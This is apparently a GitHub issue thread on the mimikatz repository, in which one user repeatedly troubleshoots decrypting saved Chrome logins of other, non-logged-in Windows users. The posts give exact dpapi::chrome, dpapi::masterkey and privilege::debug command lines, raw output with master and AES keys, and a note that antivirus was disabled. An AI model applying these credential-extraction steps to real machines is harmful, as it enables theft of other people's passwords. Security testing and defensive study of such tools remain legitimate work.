search

gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
19.5k stars 3.74k forks source link

mimikatz can't recover Chrome 80.0.3987 Logins from other user #270

Closed Papotito123 closed 3 years ago

Papotito123 commented 4 years ago

Hello: I can recover Chrome logins in running OS. But throws error when trying recovering logins for other non-logged users.

PC Win 10 1809 x64. mimikatz 2.2.0 20200229 DPAPI for RDG Google Chrome is up to date Version 80.0.3987.122 (Official Build) (64-bit)

Output: mimikatz # dpapi::chrome /in:"C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect /masterkey:de7753fdbf7873bc6f2f505779366a3962009a3ca62867b754dbc2d803639657c498f0f06d76042a89e91e5bb5b91c5a9ee18708c13039918e7aae56fbf06016

Encrypted Key found in local state file Encrypted Key seems to be protected by DPAPI

  • using CryptUnprotectData API
  • volatile cache: GUID:{9cde3a19-5d21-426e-8c43-0ff4d9b5d457};KeyHash:2efcd21e4dcbdf74316285a2d763320ebfbd6793
  • masterkey : de7753fdbf7873bc6f2f505779366a3962009a3ca62867b754dbc2d803639657c498f0f06d76042a89e91e5bb5b91c5a9ee18708c13039918e7aae56fbf06016 AES Key is: 3191f7d01223d80f7a011f58391878faaa2b24274a837ee58cef4bfba196f32b

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: zzzzzzzzz@hotmail.com

Any help much appreciated.

Papotito123 commented 4 years ago

Hello; I'm was running the wrong code.Sorry. I practiced until I got it(or I think so).

PC Win 10 1809 x64. mimikatz 2.2.0 20200229 DPAPI for RDG Google Chrome is up to date Version 80.0.3987.122 (Official Build) (64-bit).

So I found my real issues. I have to use dpapi::masterkey /password:userpassword /protected but not dpapi::masterkey /password:ntlmhash /protected to get it works when running for local user accounts in same running OS or local users in other partition.

mimikatz # dpapi::masterkey /in:"C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-337365419-192549521-2618175838-1001\7b9f7d6e-f87b-41e6-863c-d881d1155b85" /sid:S-1-5-21-337365419-192549521-2618175838-1001 /password:NTLMhash /protected MASTERKEYS dwVersion : 00000002 - 2 szGuid : {7b9f7d6e-f87b-41e6-863c-d881d1155b85} dwFlags : 00000005 - 5 dwMasterKeyLen : 000000b0 - 176 dwBackupKeyLen : 00000090 - 144 dwCredHistLen : 00000014 - 20 dwDomainKeyLen : 00000000 - 0 [masterkey] MASTERKEY dwVersion : 00000002 - 2 salt : 007774122c2684dd5cf8719563aeba15 rounds : 00001f40 - 8000 algHash : 0000800e - 32782 (CALG_SHA_512) algCrypt : 00006610 - 26128 (CALG_AES_256) pbKey : d65e803e433440cabd9b336f11fea6425b93069a92ce263a9d08b7f893c2d0ecc2e8daf1144181619c4b9d768395e0b70a8936019c910a4ea36060e86e79123a31d1e153b8ac853c9c63b8448e3b654342ad40b3e868f64aa236e816a55f9a08e0ab84676980dca579b289d2f7d87626dc8c36e6b602c6443c6080f2a97c68a7d65b6a7ff832d37c889c3a822516df2d

[backupkey] MASTERKEY dwVersion : 00000002 - 2 salt : 520115e73c2255170f760e800b5c3e72 rounds : 00001f40 - 8000 algHash : 0000800e - 32782 (CALG_SHA_512) algCrypt : 00006610 - 26128 (CALG_AES_256) pbKey : cd191e8a80a32e349cf67b1a71785d9b36d3795e5babe5682ee6b5a72a369fd48c8d53c9323b454f9825793587ba8dded98793baa2a1bc5a06114cde2597625ee4d8a05c2cb09153e0de474897a8b6690f87ba8538bcb93b9a9e43da87ba7927cd774f91c7f976f215410daffb1a6e2d

[credhist] CREDHIST INFO dwVersion : 00000003 - 3 guid : {c003f778-a504-48c7-8786-dce648989d75}

[masterkey] with password: NTLMhash (protected user) ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_masterkey_with_password

Also something more. If my user account is a user MicrosoftAccount login,no matters if I run dpapi::masterkey /password:userpassword /protected OR /password:ntlmhash /protected ,always giver same error.

ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_masterkey_with_password

I thought dpapi::masterkey /password:ntlmhash /protected will works on average joe user scenario. There's something should I aware?

Any info will be good.

Thanks.

Papotito123 commented 4 years ago

Hello: Just adding some info to my issue.

I tried: dpapi::masterkey /sid:SID /password:mypassword /protected dpapi::masterkey sid:SID /password:mypassword /unprotect dpapi::masterkey sid:SID /hash:ntlmhash /protected dpapi::masterkey sid:SID /hash:ntlmhash /unprotect

,but always throw error; ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_masterkey_with_password

Thanks for any info.

Papotito123 commented 4 years ago

Hello: Win 10 1809 x64 I can recover Chrome logins in running OS. I can recover non-logged local user Chrome Logins.

I can recover Chrome logins in a MicrosoftAccount user. I have issue(?) recovering this MicrosoftAccount user Chrome Logins when not-logged, doing it from other user account. After playing with some commands for some days I thought something can be missing. So I noticed, different from other Chrome recovering, that for this MicrosoftAccount user dpapi::chrome /unprotect command is not giving 2 GUID.

If I use the first GUID I can't grab Masterkey giving this error: [masterkey] with password: userpassword (protected user) ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_masterkey_with_password

The specific the GUID name pertinent to the URL is not showing giving error ,as this:

C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200308 Masterkey\mimikatz_trunk\x64>mimikatz.exe

.#####. mimikatz 2.2.0 (x64) #18362 Mar 8 2020 13:32:41 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )

\ / ## > http://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # log Using 'mimikatz.log' for logfile : OK

mimikatz # privilege::debug Privilege '20' OK

mimikatz # dpapi::chrome /in:"C:\Users\PROBANDO\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

Encrypted Key found in local state file Encrypted Key seems to be protected by DPAPI

  • using CryptUnprotectData API ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; NTE_BAD_KEY_STATE, needed Masterkey is: {guid-file-name}

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: myemail@hotmail.com ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption

mimikatz # EXIT

This {guid-file-name} could be grabbed/recover ? As side not, I tested other Chrome recovering tools and most of them says ,for Chrome login password, a placeholder of .

If I try to perform something that is not possible, please give me a clear and straight answer.

Any info much appreciated.

Papotito123 commented 4 years ago

Hello: Sorry to be so sticky. Win 10 1809 x64. AVAST disabled until Restart.Chrome updated to latest.

I create a new local user(Administrator) and save a Chrome login.

Then I login to my TESTACCOUNT user and do this to recover Chrome logins from a MicrosoftAccount user(PROBANDO) : C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200308 Cache & Masterkey\mimikatz_trunk\x64>mimikatz.exe

.#####. mimikatz 2.2.0 (x64) #18362 Mar 8 2020 18:30:37 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )

\ / ## > http://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # log Using 'mimikatz.log' for logfile : OK

mimikatz # privilege::debug Privilege '20' OK

mimikatz # dpapi::chrome /in:"C:\Users\PROBANDO\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

Encrypted Key found in local state file Encrypted Key seems to be protected by DPAPI

  • using CryptUnprotectData API ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; NTE_BAD_KEY_STATE, needed Masterkey is: {GUIDname}

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: myemail@hotmail.com ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption

mimikatz # dpapi::masterkey /in:"C:\Users\PROBANDO\AppData\Roaming\Microsoft\Protect\S-1-5-21-xxxxxxxxxx-1003\GUIDname" /sid:S-1-5-21-xxxxxxxxxxxx-1003 /password:userpassword /protected

And still gives this error: [masterkey] with password: userpassword (protected user) ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_masterkey_with_password

This is the same procedure I did for recovering other 2 local accounts Chrome logins from inside TESTACCOUNT user.

Where is the error ?

Thanks in advanced.

Papotito123 commented 4 years ago

Hello: Not even this command gives the URL guid name;

dpapi::chrome /state:"C:\Users\PROBANDO\AppData\Local\Google\Chrome\User Data\Local State" /in:"C:\Users\PROBANDO\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

Encrypted Key found in local state file Encrypted Key seems to be protected by DPAPI

  • using CryptUnprotectData API ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; NTE_BAD_KEY_STATE, needed Masterkey is: {bb0fd3d0-3daa-4d06-aa93-a282eea027db}

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: myemail@hotmail.com ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption

Just keep rolling.